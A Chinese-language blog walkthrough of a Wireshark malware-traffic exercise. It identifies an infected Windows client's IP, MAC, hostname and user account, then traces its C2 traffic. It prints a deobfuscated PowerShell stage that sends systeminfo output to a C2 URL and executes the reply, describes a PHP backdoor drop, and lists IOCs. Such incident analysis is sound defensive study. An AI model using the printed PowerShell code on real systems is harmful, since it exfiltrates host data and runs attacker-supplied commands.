当前位置: 首页 > news >正文

Wireshark流量分析——2025-06-13 Its a trap!

背景信息

  • 局域网段范围:10.6.13[.]0/24(从 10.6.13[.]0 到 10.6.13[.]255)

  • 域名:massfriction[.]com

  • 活动目录(AD)域控制器:10.6.13[.]3 - WIN-DQL4WFWJXQ4

  • AD 环境名称:MASSFRICTION

  • 局域网段网关:10.6.13[.]1

  • 局域网段广播地址:10.6.13[.]255

目标

1.受感染 Windows 客户端的 IP 地址是什么?

2.被感染 Windows 客户端的 MAC 地址是什么?

3.被感染 Windows 客户端的主机名是什么?

4.被感染的 Windows 客户端上的用户账户名是什么?

分析

1.image-20260804135523229

看会话,字节倒序找受感染IP,感染内网IP为10.6.13.133

2.image-20260804135650346

过滤感染主机直接看MAC,此处为24:77:03:ac:97:df

3.image-20260804135803134

过滤nbns,获取主机名为DESKTOP-5AVE44C

或者过滤kerberos找主机名

image-20260804140051399

4.image-20260804140205119

同样过滤

kerberos and kerberos.CNameString and !(kerberos.CNameString contains "$")

看CNameString即为用户名,rgaines

答案

1.受感染 Windows 客户端的 IP 地址是什么?10.6.13.133

2.被感染 Windows 客户端的 MAC 地址是什么?24:77:03:ac:97:df

3.被感染 Windows 客户端的主机名是什么?DESKTOP-5AVE44C

4.被感染的 Windows 客户端上的用户账户名是什么?rgaines

拓展

image-20260804155942269

image-20260804172037824

过滤了感染主机的http请求,发现了104.21.24.186、104.16.231.132、104.21.112.1、104.21.16.1、217.20.51.22、23.192.223.206、23.192.223.240,分别过滤每个IP查下DNS查询

image-20260804172148203

image-20260804160156794

image-20260804165816835

event-time-microsoft.org:104.21.24.186
varying-rentals-calgary-predict.trycloudflare.com:104.16.231.132
eventdata-microsoft.live:104.21.112.1
event-datamicrosoft.live:104.21.16.1
ctldl.windowsupdate.com:非恶意域名,忽略,217.20.51.22
www.msftconnecttest.com:非恶意域名,忽略,23.192.223.206
acroipm2.adobe.com:非恶意域名,忽略,23.192.223.240

所以接下来关注104.21.24.186、104.21.112.1、104.21.16.1、104.16.231.132

(1)104.21.24.186

image-20260804172325919

image-20260804173622574

追踪http流分析响应体,发现请求了一个高度混淆的 PowerShell 恶意程序,其核心行为为:拼接 Base64 片段 → 解码 → 执行第二阶段载荷,最终实现信息收集和远程命令执行。

第二阶段载荷:

image-20260804174823407

# 1. 定义 C2 服务器 URL(缺少协议头,实际请求时可能使用 HTTP/HTTPS)
$c2Url = "eventdata-microsoft.live/NV4RgNEu"# 2. 收集系统信息(执行 systeminfo 并转为字符串)
$sysInfo = systeminfo | Out-String# 3. 设置 HTTP 请求的 Content-Type 为二进制流(伪装流量)
$contentType = "application/octet-stream"# 4. 动态构造 "Invoke-RestMethod" 命令(通过数字转字符)
$invokeRestMethod = [string]::join('', (73,110,118,111,107,101,45,82,101,115,116,77,101,116,104,111,100 | ForEach-Object { [char]$_ }))
# 上述数字数组对应 ASCII:I n v o k e - R e s t M e t h o d# 5. 发送 POST 请求,将系统信息作为 Body 发送,并接收服务器响应
$response = & $invokeRestMethod -Uri $c2Url -Method POST -Body $sysInfo -ContentType $contentType# 6. 动态构造 "Invoke-Expression" 命令(同样通过数字转字符)
$invokeExpression = [string]::join('', (73,110,118,111,107,101,45,69,120,112,114,101,115,115,105,111,110 | ForEach-Object { [char]$_ }))
# 对应:I n v o k e - E x p r e s s i o n# 7. 执行服务器返回的内容($response 应为 PowerShell 代码)
& $invokeExpression $response

这段代码执行 systeminfo命令获取配置,然后通过 Invoke-RestMethodeventdata-microsoft.live/NV4RgNEu 发送 POST 请求,传递泄露的系统信息。

(2)104.21.112.1

image-20260805105744075

image-20260805110256640

这是受害ipPOST上传系统信息

image-20260805110327073

响应代码很长,但和前面一样,攻击者依旧采用拼接Base64片段并解码的方式绕过过滤和检测,,获取临时目录,创建目标目录,然后从正规的php网站下载php环境下载zip包,解压到目标目录,构造POST请求到C2地址eventdata-microsoft.live/NV4RgNEu,并执行服务器返回的命令

(3)104.21.16.1&104.16.231.132

image-20260805114512250

每30s一个包,三个域名轮换,windows-msgas.comevent-datamicrosoft.live ↔ trycloudflare 隧道(varying-rentals-calgary-predict.trycloudflare.com),后续都是一样,除了有个/assets/Owner/arm/ProcessMAU.txt路径,响应304,无关紧要

IOC:

C2域名:event-time-microsoft.org / eventdata-microsoft.live / event-datamicrosoft.live / windows-msgas.com / dng-microsoftds.com / 两个 *.trycloudflare.com 隧道域名
C2IP:104.21.24.186, 104.21.112.1, 104.21.16.1, 104.16.230.132, 104.16.231.132, 172.67.146.241
UA特征:Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.26100.4202
通信特征:30s 固定信标间隔;URI 含 '&'+32位hex token;Content-Type:application/octet-stream
落地文件:'%APPDATA%\php\php.exe'、'%APPDATA%\php\config.cfg'、'%TEMP%\php.zip'

攻击链:

flowchart TDA["外网恶意分发<br/>event-time-microsoft.org<br/>(Cloudflare 代理)"] --> B["PowerShell 下载器<br/>(伪装 MS 域名)"]B --> C1["POST systeminfo<br/>收集主机信息"]C1 --> C2["发送至 C2 信标<br/>eventdata-microsoft.live/NV4RgNEu"]B --> D["从合法站点下载<br/>windows.php.net<br/>PHP 8.2.28 (~33MB)"]D --> E["本地落地 PHP 后门"]E --> E1["%APPDATA%\\php\\config.cfg"]E --> E2["%APPDATA%\\php\\php.exe"]E2 --> F["PHP 后门执行"]F --> G["每 30s 向 C2 信标"]G --> H["3 域名轮换抗封禁"]H --> H1["windows-msgas.com"]H --> H2["event-datamicrosoft.live"]H --> H3["trycloudflare 隧道"]
http://www.jsqmd.com/news/1335067/

相关文章:

  • 终极指南:iNKORE.UI.WPF.Modern如何让传统WPF应用焕发新生
  • 8.5总结
  • MobaXterm中文版:Windows远程管理的终极一站式解决方案
  • 2026 无锡除醛相关知识整理,给准备装修完的家庭 - 德耳斯
  • iNKORE.UI.WPF.Modern:WPF现代化UI架构深度解析与实践指南
  • 3步解锁:招聘时间可视化插件深度指南
  • 如何在Mac上免费解锁视频预览功能:三步解决Finder无法显示视频缩略图的烦恼
  • 如何快速实现微信QQ消息防撤回:告别“对方已撤回“的终极指南
  • 2026 深圳工厂大型设备、拆迁废料回收首选绿鹏城回收|上门高价回收,整厂清场一站式搞定 - 幸福生活序曲
  • 投标3A认证哪里办?企业用手机办理的流程和实用教程 - 跑政通
  • 政府采购3A认证如何办理?手机申请流程和线上办理方法 - 跑政通
  • 国家中小学智慧教育平台电子课本下载工具:三步高效获取官方教育资源完整指南
  • SeedVC-MLX语音转换完全指南:从零开始打造个性化声音
  • Docker PHP实战指南:5个高效容器管理技巧与完整API集成方案
  • 守义初心 潮启新程——解码义利百廿风华的时代答卷 - 资讯在线
  • Mermaid Live Editor:5个理由让你立即上手的免费在线图表编辑器
  • 小白程序员必看:AI智能体应用入门指南,轻松掌握未来趋势
  • 2026年山西武术学校正规办学资质+奥运冠军技术指导 - 圣龙武术朱老师
  • Mishka Chelekom:Phoenix LiveView终极UI组件库,10分钟快速上手指南
  • 3步构建智能金融预测系统:Kronos金融AI模型实战指南
  • 2026西安夏秋西服选型全解析:扛住“秋老虎”与空调房,一套搞定婚礼与通勤 - 产业观察报
  • 冒险岛WZ文件编辑:从零开始打造你的游戏世界
  • 国资监管数据上报系统应该如何干?全套落地实操指南 - 搭贝
  • WuWa-Mod技术架构解析:鸣潮游戏模组系统实现原理
  • 2026年宁波出国留学机构**前十**:十家优选深度解析 - 科技焦点
  • 终极指南:如何从零开始构建自己的编程语言解释器
  • 2026年浙江扎带厂家,尼龙扎带、不锈钢扎带、彩色扎带,自锁式尼龙扎带、可松式活扣尼龙扎带工厂选型! - 优企名品
  • 2026年08月:制造业工厂安保服务供应厂家综合能力评估分析 - 卓企推荐
  • Redis guarantees the scripts atomic execution.
  • 2026年宁波出国留学机构哪家实力强:五家优选深度解析 - 科技焦点